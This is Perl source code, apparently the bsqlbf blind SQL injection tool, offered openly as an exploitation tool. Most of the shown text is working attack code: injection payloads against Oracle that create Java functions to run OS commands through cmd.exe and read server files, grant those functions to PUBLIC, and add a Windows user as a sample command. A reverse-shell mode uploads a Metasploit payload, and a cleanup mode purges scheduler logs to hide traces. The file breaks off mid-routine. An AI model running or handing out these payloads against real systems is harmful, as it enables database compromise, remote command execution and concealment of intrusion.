blind

1. #!/usr/bin/env perl
2. # Blind SQL Injection POC. aramosf@514.es // http://www.514.es
3. #modified by sid//sid@notsosecure.com
4. #
5. #
6. # TODO:
7. # [ ] Rip more code from others.
8. use LWP::Simple;
9. use LWP::UserAgent;
10. use Getopt::Long;
11. use IO::Handle;
12. use strict;
13. use threads;
14. use threads::shared;
15. use Time::HiRes qw( usleep);
16. use URI;
17.  
18. $| = 1;
19.  
20.  
21. ###############################################################################
22. my $default_debug = 0;
23. my $default_length = 32;
24. my $default_method = "GET";
25. my $default_cmd = "ping 127.0.0.1";
26. my $default_file = "C:\\boot.ini";
27. my $default_stype=0;
28. my $default_time = 0;
29. my $version = "2.7";
30. my $default_useragent = "bsqlbf $version";
31. my $default_sql = "(select \@\@version)";
32. #my $cmdfile;
33. my $LOGFILE="cmd.txt";
34. my $line;
35. my $ip="";
36. my $port="";
37. my $err_count=0;
38. my $url_clean;
39. ###############################################################################
40.  
41.  
42. $| = 1;
43.  
44. my ($args, $solution);
45. my (%vars, @varsb);
46. my ($lastvar, $lastval);
47. my ($scheme, $authority, $path, $query, $fragment);
48. my ($head, $tail, $high);
49. my $hits = 0;
50. my $amatch = 0;
51. my ($ua,$req);
52. my $furl;
53.  
54. ###############################################################################
55. # Define GetOpt:
56. my ($url, $type, $database, $sql, $time, $rtime, $match, $nomatch, $uagent, $debug);
57. my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
58. my ($start, $length, $method, $cmd, $file, $stype, $cookie, $blind);
59. my ($help, $get);
60. my ($ascii, $binary);
61.  
62. my $options = GetOptions (
63.   'help!'            => \$help,
64.   'url=s'            => \$url,
65.   'database=s'       => \$database,
66.   'type=s'           => \$type,
67.   'get=s'            => \$get,
68.   'sql=s'            => \$sql,
69.   'blind=s'          => \$blind,
70.   'match=s'          => \$match,
71.   'nomatch=s'          => \$nomatch,
72.   'start=s'          => \$start,
73.   'length=s'         => \$length,
74.   'method=s'         => \$method,
75.    'cmd=s'           => \$cmd,
76.    'file=s'          => \$file,
77.  'stype=s'       => \$stype,
78.   'uagent=s'         => \$uagent,
79.   'ruagent=s'        => \$ruagent,
80.   'cookie=s'         => \$cookie,
81.   'proxy=s'          => \$proxy,
82.   'proxy_user=s'     => \$proxy_user,
83.   'proxy_pass=s'     => \$proxy_pass,
84.   'rproxy=s'         => \$rproxy,
85.   'debug!'           => \$debug,
86.   'binary!'           =>\$binary,
87.   'ascii!'           => \$ascii,
88.   'rtime=s'          => \$rtime,
89.   'time=i'           => \$time ,
90.     'port=s'           => \$port,
91.   'ip=s'           => \$ip
92.  
93.   );
94.  
95. &help unless ($url);
96. &help if $help eq 1;
97.  
98. #########################################################################
99. # Default Options.
100. $uagent         ||= $default_useragent;
101. $debug          ||= $default_debug;
102. $length         ||= $default_length;
103. $solution       ||= $start;
104. $method         ||= $default_method;
105. $cmd         ||= $default_cmd;
106. $file         ||= $default_file;
107. $stype        ||= $default_stype;
108. $sql            ||= $default_sql;
109. $time           ||= $default_time;
110.  
111. ######################################################################
112.  
113. #function to make GET, POST requests from the url
114.  
115. #my $usage = "$0 method url cookies proxy\n";
116.  
117. #print $method;
118. my $method_gp ;
119. my $url_gp ;
120. my $cookies_gp;
121. my $proxy_gp ;
122.  
123. # get_from_post("http://host/script.pl?a=b&c=d", "cook1=2; foo=bar", "http://prox:8080")
124. #print get_or_post($method, $url, $cookies, $proxy);
125.  
126. sub get_or_post {
127.         my ($method_gp, $url_gp, $cookies_gp, $proxy_gp) = @_;
128.         my $uri = URI->new($url_gp);
129.         print Dumper $uri->query;
130.  
131.         my $req;
132.         if (($method_gp eq "GET")||($method_gp eq "get")) {
133.                 $req = HTTP::Request->new(GET => $uri->scheme . "://" . $uri->host . ":" . $uri->port . $uri->path . "?" . $uri->query);
134.                     }
135.  
136.                     elsif (($method_gp eq "POST")||($method_gp eq "post")) {
137. $req = HTTP::Request->new(POST=> $uri->scheme . "://" . $uri->host . ":" . $uri->port . $uri->path);
138. $req->content($uri->query);
139.         }
140.         else {
141.                 die "ERROR: unknown method: $method\n";
142.         }
143.  
144.         my $ua = LWP::UserAgent->new;
145.         # $ua->env_proxy; # allow usage of env var http_proxy=http://host:8080
146.         $ua->proxy(['http', 'https'], $proxy_gp) if defined($proxy_gp);
147.         $ua->default_header('Cookie' => $cookies_gp) if defined($cookies_gp);
148.         $ua->default_header('Content-Type' => 'application/x-www-form-urlencoded');
149.         my $res = $ua->request($req);
150.         return $res->as_string;
151. }
152.  
153.  
154. ##########################################################################
155. &createlwp();
156. &parseurl();
157. my $end=0;
158. if ( ! defined($blind)) {
159.         $lastvar = $varsb[$#varsb];
160.         $lastval = $vars{$lastvar};
161. } else {
162.         $lastvar = $blind;
163.         $lastval = $vars{$blind};
164. }
165.  
166. if (! defined($type)) {
167.     $type=0;
168. }
169.  
170. if ($type==3) {
171.     $database=3;
172. }
173. if ($type==4) {
174.     $database=3;
175. }
176. if (! defined($database)) {
177.        
178. print "\nWARNING: You did not specify any database, I am assuming you are after A Microsoft Product\n";
179. $database=0;
180. }
181.  
182. if (defined($cookie)) { &cookie() }
183. if (!$match && !$nomatch){
184. #print "wtf";
185.     print "\nTrying to find a match string...\n" if $debug == 1;
186.     $amatch = "1";
187.     $match = fmatch("$url"," AND 1=");
188.     if ($match eq "no vulnerable")
189.         {
190.         print "\nNo vuln: 2nd..\n" if $debug ==1;
191.         $match = fmatch("$url"," AND 1='");
192.         #$head = "\"";
193.         #$tail = " AND 1=\"1";
194.     };
195.     if ($match eq "no vulnerable") {
196.         print "Not vulnerable \n\n If you know its vulnerable supply the '-match' string\n";
197.         exit 0;
198.     }
199. }
200. &banner();
201. &httpintro();
202.  
203.  
204.  
205.  
206. ############################ Type 6###########################################
207.     if($type==6)
208.     {
209.        
210.        
211.         print "--------------------------------\n";
212.         print "--------------------------------\n";
213.         print "Oracle O.S command execution\n";
214.         print "\nNOTE: Please provide the vulnerable parameter as the last parameter\n";
215.         print "\nThis will only work if your injection allows execution of SQL as SYS user\n";
216.         print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
217.         print "\n\n\n--------------------------------\n\n\n";
218.         print "String to Match: ".$match."\n";
219.         $stype=0;
220.        
221.         #-----ora_cmd.pl--starts here
222. ################################## S Type: 0########################################
223.         if ($stype==0) {
224.        
225.         print "You asked me to execute \"".$cmd."\" on remote box with stype:".$stype."\n";
226.         print "--------------------------------\n\n\n";
227.  
228. my $url_1 = $url." and ";
229. my $javalib="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','CCCCC') from dual) =0--";
230.  
231. my $javaperm="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','CCCCC') from dual) =0--";
232.  
233. my $cmd_exec_func="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','CCCCC') from dual)=0--";
234.  
235. my $priv_check="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''select user from dual'';END;--','CCCCC') from dual)=0--";
236. my $cmd_exec_func_priv="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','CCCCC') from dual) =0--";
237.  
238.  
239. my $cmd_exec_func_unpriv="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','CCCCC') from dual)=0--";
240.  
241. my $cmd_1=$cmd;
242. my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
243.  
244. ####checking if user has privileges to vulnerable function
245.  
246. print "Checking if we have privileges to execute function SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC()...\n";
247. #print "--------------------------------\n";
248. my $url=$url_1.$priv_check;
249. #print $method;
250. #print $url;
251. my $content = get_or_post($method,$url,$cookie,$proxy);
252. die "Couldn't get $url" unless defined $content;
253.  
254.  
255.   if(! ($content =~ m/($match)/i)) {
256.     print "-----------------------------------------------\n";
257.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
258.     print "-----------------------------------------------\n";
259.   } else {
260.     print "\n\n\n--------------------------------\n\n\n";
261.     print "Sit back....Let's exploit this...\n";
262.     print "--------------------------------\n";
263.    
264. # print $content;
265. }
266.  
267.  
268. #####--------------------#####
269.  
270. print "Step 1. Creating Java Library...\n";
271. #print "--------------------------------\n";
272. my $url=$url_1.$javalib;
273. #print $method;
274. #print $url;
275. my $content = get_or_post($method,$url,$cookie,$proxy);
276. die "Couldn't get $url" unless defined $content;
277.  
278.  
279.   if(! ($content =~ m/($match)/i)) {
280.     print "-----------------------------------------------\n";
281.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
282.     print "-----------------------------------------------\n";
283.   } else {
284.     print "NO errors encountered.....proceeding to step..2\n";
285.     print "--------------------------------\n";
286.    
287. # print $content;
288. }
289.  
290. #-----------------------
291. print "Step 2. granting java execute privileges...\n";
292. my $url=$url_1.$javaperm;
293. my $content = get_or_post($method,$url,$cookie,$proxy);
294. die "Couldn't get $url" unless defined $content;
295.  
296.  
297.   if(! ($content =~ m/($match)/i)) {
298.     print "-----------------------------------------------\n";
299.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
300.     print "-----------------------------------------------\n";
301.     print "I will proceed, however, there is a possibility that the attack will fail\n";
302.   } else {
303.     print "NO errors encountered.....proceeding to step..3\n";
304.     print "--------------------------------\n";
305.    
306. # print $content;
307. }
308.  
309. #-----------------------
310. print "Step 3. creating funtion for command execution...\n";
311. my $url=$url_1.$cmd_exec_func;
312. my $content = get_or_post($method,$url,$cookie,$proxy);
313. die "Couldn't get $url" unless defined $content;
314.  
315.  
316.   if(! ($content =~ m/($match)/i)) {
317.     print "-----------------------------------------------\n";
318.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
319.     print "-----------------------------------------------\n";
320.     print "I will proceed, however, there is a possibility that the attack will fail\n";
321.   } else {
322.     print "NO errors encountered.....proceeding to step..4\n";
323.     print "--------------------------------\n";
324.    
325. # print $content;
326. }
327.  
328. #-----------------------
329. print "Step 4. making function executable by all users...\n";
330. my $url=$url_1.$cmd_exec_func_priv;
331. my $content = get_or_post($method,$url,$cookie,$proxy);
332. die "Couldn't get $url" unless defined $content;
333.  
334.  
335.   if(! ($content =~ m/($match)/i)) {
336.     print "-----------------------------------------------\n";
337.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
338.     print "-----------------------------------------------\n";
339.     print "I will proceed, however, there is a possibility that the attack will fail\n";
340.   } else {
341.     print "NO errors encountered.....proceeding to step..5\n";
342.     print "--------------------------------\n";
343.    
344. # print $content;
345. }
346.  
347. #-----------------------
348. print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
349. print "--------------------------------\n";
350. print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
351. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
352. my $url=$url_1.$cmd_exec;
353. my $content = get_or_post($method,$url,$cookie,$proxy);
354. die "Couldn't get $url" unless defined $content;
355.  
356.  
357.   if(! ($content =~ m/($match)/i)) {
358.     print "-----------------------------------------------\n";
359.     print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
360.     print "-----------------------------------------------\n";
361.     print "...You need to investigate buddy....\n";
362.   } else {
363.     print "-----------------------------------------------\n";
364.     print "SUCCESS: Your command executed on the box....:)\n";
365.     print "-----------------------------------------------\n";
366.  
367.   }
368. #-----------------------
369. print "Step 6. Droping function sys.LinxRunCMD...\n";
370. my $url=$url_1.$cmd_exec_func_unpriv;
371. my $content = get_or_post($method,$url,$cookie,$proxy);
372. die "Couldn't get $url" unless defined $content;
373.  
374.   if(! ($content =~ m/($match)/i)) {
375.     print "-----------------------------------------------\n";
376.     print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
377.     print "-----------------------------------------------\n";
378.     print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
379.     exit 0;
380.   } else {
381.     print "Function dropped..\n";
382.     exit 0;
383. }
384.     }
385.  
386. }
387.  
388. ####################### Type 6 stops here #########################################
389.  
390. ########################Type 7 Starts here##########################################
391.  
392.     if($type==7)
393.     {
394.        
395.        
396.         print "\n--------------------------------\n";
397.         #print "--------------------------------\n";
398.         print "Oracle O.S command execution with SYS.KUPP\$PROC.CREATE_MASTER_PROCESS()... \n";
399.         print "NOTE: Please provide the vulnerable parameter as the last parameter\n";
400.         print "This will only work if your injection allows execution of SQL as DBA\n";
401. #       print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
402.         #print "\n\n\n--------------------------------\n\n\n";
403.         print "String to Match: ".$match."\n";
404. #       $stype=0;
405.        
406.         #-----ora_cmd.pl--starts here
407. ################################## S Type: 0########################################
408. #       if ($stype==0) {
409.        
410.         print "You asked me to execute \"".$cmd."\" on remote database host\n";
411.         print "--------------------------------\n";
412.  
413. my $url_1 = $url;
414. my $create_prog=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''notsosecurex'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c ".$cmd." '',0,TRUE);')from dual) is not null --";
415. my $priv_check=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('null') from dual) is not null --";
416. my $create_job="  and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_job(job_name=>''notsosecurexx'',program_name=>''notsosecurex'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);')from dual) is not null-- ";
417. my $remove_job=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.DROP_PROGRAM(''notsosecurex'');')FROM DUAL) is not null --";
418. #my $cmd_exec_func="";
419.  
420.  
421. #my $cmd_1=$cmd;
422. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
423.  
424. ####checking if user has privileges to vulnerable function
425.  
426. print "Checking if we have privileges to execute function SYS.KUPP\$PROC.CREATE_MASTER_PROCESS()...\n";
427. #print "--------------------------------\n";
428. my $url=$url_1.$line;
429. #print $method;
430. #print $url;
431. my $content = get_or_post($method,$url,$cookie,$proxy);
432. die "Couldn't get $url" unless defined $content;
433.  
434.  
435.   if(! ($content =~ m/($match)/i)) {
436.     print "-----------------------------------------------\n";
437.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
438.     print "-----------------------------------------------\n";
439.   } else {
440. #   print "\n\n\n--------------------------------\n\n\n";
441.     print "Sit back.. we have the right Permissions :)\nLet's exploit this...\n";
442.     print "--------------------------------\n";
443.    
444. #############################reverse shell code goes here###################
445. ##if $cmd="shell"
446.  
447. if($cmd eq "revshell")
448. {
449. #if (($ip eq "")|($port eq ""))
450. #{ print "ERROR: IP or port not supplied for reverse shell";
451. #exit 0;
452. #}
453.  
454. print "Reading file cmd.txt \n Uploading metasploit's payload\n";
455. open LOGFILE, "cmd.txt" or die("Could not open cmd file. Did you run generator.exe to generate cmd.txt\n");
456. foreach $line (<LOGFILE>) {
457. #print "line is: ".$line;  
458. my $url=$url_1.$line;
459. #print $method;
460. #print $url;
461. my $content = get_or_post($method,$url,$cookie,$proxy);
462. die "Couldn't get $url" unless defined $content;
463.  
464.  
465.   if(! ($content =~ m/($match)/i)) {
466.     #print "-----------------------------------------------\n";
467.     print "!!";
468.     $err_count=$err_count+1;
469.     #print "-----------------------------------------------\n";
470.   } else {
471. #   print "\n\n\n--------------------------------\n\n\n";
472.     print "..";
473. }
474. }
475.  
476. if ($err_count>0)
477. { print "\n".$err_count." Error Occured, it may not work\n";
478.  
479. }
480. else{
481. print "\nYipee! Should have a session now!\nRemember to clean up the server after exiting the metasploit session, -cmd=cleanup\n";
482. exit 0;
483. }
484. }
485. ##############################reverse shell code ends here###################
486.    
487. ##########################clean up code#####################
488.  
489.  
490. if($cmd eq "cleanup")
491. {
492.  
493. $err_count=0;
494.  
495. $url_clean=" and (SELECT SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('BEGIN dbms_lock.sleep(1);DBMS_SCHEDULER.drop_program(PROGRAM_NAME => ''BSQLBFPROG'');DBMS_SCHEDULER.PURGE_LOG;END;') from dual) is not null--";  
496. my $url=$url_1.$url_clean;
497.  
498.  
499. my $content = get_or_post($method,$url,$cookie,$proxy);
500. die "Couldn't get $url" unless defined $content;
501.  
502.  
503.   if(! ($content =~ m/($match)/i)) {
504.     #print "-----------------------------------------------\n";
505.     print "!!";
506.     $err_count=$err_count+1;
507.     #print "-----------------------------------------------\n";
508.   } else {
509. #   print "\n\n\n--------------------------------\n\n\n";
510.     print "..";
511. }
512.  
513.  
514. if ($err_count>0)
515. { print "\n".$err_count." Error Occured!";
516.  
517. }
518. else{
519. print "System cleaned";
520. exit 0;
521. }
522. }
523.  
524.  
525.  
526. ####################clean up code ends##########################   
527.    
528.    
529.    
530. # print $content;
531.  
532. print "Step1. Creating Program with DBMS_SCHEDULER\n";
533. my $url=$url_1.$create_prog;
534. #print $method;
535. #print $url;
536. my $content = get_or_post($method,$url,$cookie,$proxy);
537. die "Couldn't get $url" unless defined $content;
538.  
539.  
540.   if(! ($content =~ m/($match)/i)) {
541.     print "-----------------------------------------------\n";
542.     print "ERROR: Something is not quite right, i will still continue to 2nd step \n";
543.     print "-----------------------------------------------\n";
544.   } else {
545.     print "..Program Created..\n";
546.     print "--------------------------------\n";
547.   }
548.  
549.  
550. print "Step2. Creating JOB with DBMS_SCHEDULER\n";
551. my $url=$url_1.$create_job;
552. #print $method;
553. #print $url;
554. my $content = get_or_post($method,$url,$cookie,$proxy);
555. die "Couldn't get $url" unless defined $content;
556.  
557.  
558.   if(! ($content =~ m/($match)/i)) {
559.     print "-----------------------------------------------\n";
560.     print "ERROR: Unable to create job, i will still continue to 3rd step \n";
561.     print "-----------------------------------------------\n";
562.   } else {
563.     #print "\n\n\n--------------------------------\n\n\n";
564.     print "..Job Created Created.\n. your command should have been executed by now \n";
565.     print "Sleeping for 10 seconds \n";
566.     print "\n--------------------------------\n";
567.     sleep(10);
568.   }
569.  
570. print "Step3. Removing JOB (Clean-up)\n";
571. my $url=$url_1.$remove_job;
572. #print $method;
573. #print $url;
574. my $content = get_or_post($method,$url,$cookie,$proxy);
575. die "Couldn't get $url" unless defined $content;
576.  
577.  
578.   if(! ($content =~ m/($match)/i)) {
579.     print "-----------------------------------------------\n";
580.     print "ERROR: Unable to Remove job\n";
581.     print "-----------------------------------------------\n";
582.   } else {
583. #   print "\n\n\n--------------------------------\n\n\n";
584.     print "..Job Removed..\n";
585.     print "--------------------------------\n";
586. die "Enjoy!";
587. #   sleep(10);
588.   }
589.  
590.  
591.   }}
592.  
593.  
594.  
595.  
596.  
597.  
598.  
599. #####--------type 7 stops here------------#####
600.  
601.  
602.  
603.  
604.  
605. ######--type 8 starts here-----------------#######
606.  
607.     if($type==8)
608.     {
609.        
610.        
611.         print "\n--------------------------------\n";
612.         #print "--------------------------------\n";
613.         print "Oracle O.S command execution with DBMS_JAVA_TEST.FUNCALL... \n";
614.         print "NOTE: Please provide the vulnerable parameter as the last parameter\n";
615.         print "This will only work if the user has JAVA IO privileges\n";
616. #       print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
617.         #print "\n\n\n--------------------------------\n\n\n";
618.         print "String to Match: ".$match."\n";
619. #       $stype=0;
620.        
621.        
622.         print "You asked me to execute \"".$cmd."\" on remote database host\n";
623.         print "--------------------------------\n";
624.  
625. my $url_1 = $url;
626. my $exec_java_cmd=" and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','/c',' ". $cmd."') FROM DUAL) is null --";
627. my $priv_check="  and (select count(*) from user_java_policy where GRANTEE_NAME=user and type_name='java.io.FilePermission' and action ='execute') > 0 --";
628.  
629. print "Checking if we have Java IO Permissions...\n";
630. #print "--------------------------------\n";
631. my $url=$url_1.$priv_check;
632. my $content = get_or_post($method,$url,$cookie,$proxy);
633. die "Couldn't get $url" unless defined $content;
634.  
635.  
636.   if(! ($content =~ m/($match)/i)) {
637.     print "-----------------------------------------------\n";
638.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
639.     die "ending..";
640.     print "-----------------------------------------------\n";
641.   } else {
642. #   print "\n\n\n--------------------------------\n\n\n";
643.     print "Sit back.. we have the right Permissions :)\nLet's exploit this...\n";
644.     print "--------------------------------\n";
645.  
646. ################revshell code###################
647. if($cmd eq "revshell")
648. {
649. #if (($ip eq "")|($port eq ""))
650. #{ print "ERROR: IP or port not supplied for reverse shell";
651. #exit 0;
652. #}
653.  
654. print "Reading file cmd.txt \n Uploading metasploit's payload\n";
655. open LOGFILE, "cmd.txt" or die("Could not open cmd file. Did you run generator.exe to generate cmd.txt\n");
656. foreach $line (<LOGFILE>) {
657. #print "line is: ".$line;  
658. my $url=$url_1.$line;
659. #print $method;
660. #print $url;
661. my $content = get_or_post($method,$url,$cookie,$proxy);
662. die "Couldn't get $url" unless defined $content;
663.  
664.  
665.   if(! ($content =~ m/($match)/i)) {
666.     #print "-----------------------------------------------\n";
667.     print "!!";
668.     $err_count=$err_count+1;
669.     #print "-----------------------------------------------\n";
670.   } else {
671. #   print "\n\n\n--------------------------------\n\n\n";
672.     print "..";
673. }
674. }
675.  
676. if ($err_count>1)
677. { print "\n".$err_count." Error Occured, it may not work\n";
678. exit 0;
679. }
680. else{
681. print "\nYipee! Should have a session now!\n";
682. exit 0;
683. }
684. }
685.  
686. ####################revshell code ends#################
687.  
688.     my $url=$url_1.$exec_java_cmd;
689.     my $content = get_or_post($method,$url,$cookie,$proxy);
690.     die "Couldn't get $url" unless defined $content;
691.    
692.     if(! ($content =~ m/($match)/i)) {
693.         die "Error Encountered \n";
694.        
695.     }
696.     else{
697.     die "Command executed Successfully \n";
698.     }
699.  
700.  
701.   }
702.  
703.  
704.     }
705. #######-type 8 stops here ------------------########
706.  
707.  
708.  
709.  
710.  
711.  
712.  
713. ####################### Type 5 starts here #########################################
714.  
715. if ($type==5)
716. {
717. #print $file;
718.  
719. $end =1;
720. $type=0;
721. $database=3;
722. $sql="select sys.LinxReadfile('".$file."') from dual";
723. print "\n\nType 5: Creates a function to read files..\n";
724. print "--------------------------------\n\n\n";
725.  
726. my $url_1 = $url." and ";
727. my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
728.  
729. my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
730.  
731. my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
732.  
733. my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
734. my $cmd_exec_func_unpriv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual)is null--";
735.  
736. #my $cmd_1=$cmd;
737. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
738.  
739. print "Step 1. Creating Java Library...\n";
740. #print "--------------------------------\n";
741. my $url=$url_1.$javalib;
742. #print $method;
743. #print $url;
744. my $content = get_or_post($method,$url,$cookie,$proxy);
745. die "Couldn't get $url" unless defined $content;
746.  
747.  
748.   if(! ($content =~ m/($match)/i)) {
749.     print "-----------------------------------------------\n";
750.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
751.     print "-----------------------------------------------\n";
752.   } else {
753.     print "NO errors encountered.....proceeding to step..2\n";
754.     print "--------------------------------\n";
755.    
756. # print $content;
757. }
758.  
759. #-----------------------
760. print "Step 2. granting java execute privileges...\n";
761. my $url=$url_1.$javaperm;
762. my $content = get_or_post($method,$url,$cookie,$proxy);
763. die "Couldn't get $url" unless defined $content;
764.  
765.  
766.   if(! ($content =~ m/($match)/i)) {
767.     print "-----------------------------------------------\n";
768.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
769.     print "-----------------------------------------------\n";
770.     print "I will proceed, however, there is a possibility that the attack will fail\n";
771.   } else {
772.     print "NO errors encountered.....proceeding to step..3\n";
773.     print "--------------------------------\n";
774.    
775. # print $content;
776. }
777.  
778. #-----------------------
779. print "Step 3. creating funtion for reading files...\n";
780. my $url=$url_1.$cmd_exec_func;
781. my $content = get_or_post($method,$url,$cookie,$proxy);
782. die "Couldn't get $url" unless defined $content;
783.  
784.  
785.   if(! ($content =~ m/($match)/i)) {
786.     print "-----------------------------------------------\n";
787.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
788.     print "-----------------------------------------------\n";
789.     print "I will proceed, however, there is a possibility that the attack will fail\n";
790.   } else {
791.     print "NO errors encountered.....proceeding to step..4\n";
792.     print "--------------------------------\n";
793.    
794. # print $content;
795. }
796.  
797. #-----------------------
798. print "Step 4. making function executable by all users...\n";
799. my $url=$url_1.$cmd_exec_func_priv;
800. my $content = get_or_post($method,$url,$cookie,$proxy);
801. die "Couldn't get $url" unless defined $content;
802.  
803.  
804.   if(! ($content =~ m/($match)/i)) {
805.     print "-----------------------------------------------\n";
806.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
807.     print "-----------------------------------------------\n";
808. #   print "I will proceed, however, there is a possibility that the attack will fail\n";
809.     exit 0;
